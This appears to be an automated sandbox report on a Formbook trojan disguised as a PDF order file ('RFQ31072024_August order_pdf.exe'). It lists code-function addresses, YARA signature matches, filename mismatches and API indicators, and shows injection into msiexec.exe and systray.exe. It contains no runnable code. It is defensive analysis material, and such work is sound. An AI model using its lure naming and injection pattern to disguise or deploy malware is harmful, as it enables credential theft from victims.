Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_07180040	10_2_07180040
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_07181890	10_2_07181890
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_071848F8	10_2_071848F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_003F63E3	11_2_003F63E3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C9E4F6	11_2_04C9E4F6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA2446	11_2_04CA2446
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C94420	11_2_04C94420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CB0591	11_2_04CB0591
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF0535	11_2_04BF0535
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C0C6E0	11_2_04C0C6E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BEC7C0	11_2_04BEC7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C14750	11_2_04C14750
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF0770	11_2_04BF0770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C82000	11_2_04C82000
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA81CC	11_2_04CA81CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CB01AA	11_2_04CB01AA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA41A2	11_2_04CA41A2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C78158	11_2_04C78158
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BE0100	11_2_04BE0100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C8A118	11_2_04C8A118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C702C0	11_2_04C702C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C90274	11_2_04C90274
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CB03E6	11_2_04CB03E6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BFE3F0	11_2_04BFE3F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAA352	11_2_04CAA352
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BE0CF2	11_2_04BE0CF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C90CB5	11_2_04C90CB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF0C00	11_2_04BF0C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BEADE0	11_2_04BEADE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C08DBF	11_2_04C08DBF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BFAD00	11_2_04BFAD00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C8CD1F	11_2_04C8CD1F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAEEDB	11_2_04CAEEDB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C02E90	11_2_04C02E90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CACE93	11_2_04CACE93
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF0E59	11_2_04BF0E59
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAEE26	11_2_04CAEE26
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BFCFE0	11_2_04BFCFE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C6EFA0	11_2_04C6EFA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BE2FC8	11_2_04BE2FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C64F40	11_2_04C64F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C32F28	11_2_04C32F28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C10F30	11_2_04C10F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C92F30	11_2_04C92F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BD68B8	11_2_04BD68B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C1E8F0	11_2_04C1E8F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BFA840	11_2_04BFA840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF2840	11_2_04BF2840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF29A0	11_2_04BF29A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CBA9A6	11_2_04CBA9A6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C06962	11_2_04C06962
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BEEA80	11_2_04BEEA80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA6BD7	11_2_04CA6BD7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAAB40	11_2_04CAAB40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BE1460	11_2_04BE1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAF43F	11_2_04CAF43F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C8D5B0	11_2_04C8D5B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA7571	11_2_04CA7571
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA16CC	11_2_04CA16CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C35630	11_2_04C35630
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAF7B0	11_2_04CAF7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C9F0CC	11_2_04C9F0CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA70E9	11_2_04CA70E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAF0E0	11_2_04CAF0E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF70C0	11_2_04BF70C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BFB1B0	11_2_04BFB1B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CBB16B	11_2_04CBB16B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C2516C	11_2_04C2516C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BDF172	11_2_04BDF172
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C0B2C0	11_2_04C0B2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF52A0	11_2_04BF52A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C912ED	11_2_04C912ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C3739A	11_2_04C3739A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA132D	11_2_04CA132D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BDD34C	11_2_04BDD34C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAFCF2	11_2_04CAFCF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C69C32	11_2_04C69C32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C0FDC0	11_2_04C0FDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA1D5A	11_2_04CA1D5A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA7D73	11_2_04CA7D73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF3D40	11_2_04BF3D40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF9EB0	11_2_04BF9EB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF1F92	11_2_04BF1F92
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAFFB1	11_2_04CAFFB1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAFF09	11_2_04CAFF09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF38E0	11_2_04BF38E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C5D800	11_2_04C5D800
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C0B950	11_2_04C0B950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C85910	11_2_04C85910
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BF9950	11_2_04BF9950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C9DAC6	11_2_04C9DAC6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C35AA0	11_2_04C35AA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C8DAAC	11_2_04C8DAAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C91AA3	11_2_04C91AA3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAFA49	11_2_04CAFA49
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CA7A46	11_2_04CA7A46
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C63A6C	11_2_04C63A6C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C65BF0	11_2_04C65BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C2DBF9	11_2_04C2DBF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04C0FB80	11_2_04C0FB80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04CAFB76	11_2_04CAFB76
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0E825	11_2_02D0E825
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0D965	11_2_02D0D965
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02CF9E4B	11_2_02CF9E4B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02CF9E50	11_2_02CF9E50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02CF2FB0	11_2_02CF2FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0DF79	11_2_02D0DF79
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0DC45	11_2_02D0DC45
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0EC11	11_2_02D0EC11
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02CF2D88	11_2_02CF2D88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02CF2D90	11_2_02CF2D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B0A036	11_2_04B0A036
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B0E5CD	11_2_04B0E5CD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B02D02	11_2_04B02D02
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B01082	11_2_04B01082
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B08912	11_2_04B08912
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B0B232	11_2_04B0B232
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B05B30	11_2_04B05B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04B05B32	11_2_04B05B32

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C5EA12 appears 86 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C37E54 appears 111 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C25130 appears 58 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04BDB970 appears 280 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C6F290 appears 105 times
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: String function: 0165F290 appears 105 times
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: String function: 01627E54 appears 102 times
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: String function: 01615130 appears 58 times
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: String function: 015CB970 appears 278 times
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: String function: 0164EA12 appears 86 times

Source: RFQ31072024_August order_pdf.exe

Static PE information: invalid certificate

Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1431833459.0000000006980000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1426588341.00000000036CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1425810196.00000000024F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1431768421.0000000006960000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1423018819.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1490043213.000000000156F000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.000000000115F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1490188628.00000000016CD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.0000000001170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs RFQ31072024_August order_pdf.exe
Source: RFQ31072024_August order_pdf.exe	Binary or memory string: OriginalFilenametzWZ.exeL vs RFQ31072024_August order_pdf.exe

Source: RFQ31072024_August order_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7488, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msiexec.exe PID: 8124, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 7408, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: RFQ31072024_August order_pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EqtGqZpPskFq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.raw.unpack, JwlrlmCCKvmG8rWaC9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.raw.unpack, JwlrlmCCKvmG8rWaC9.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: _0020.SetAccessControl
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: _0020.AddAccessRule
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: _0020.SetAccessControl
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: _0020.AddAccessRule
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, a2FbTp8xY7SFAYgAjX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: _0020.SetAccessControl
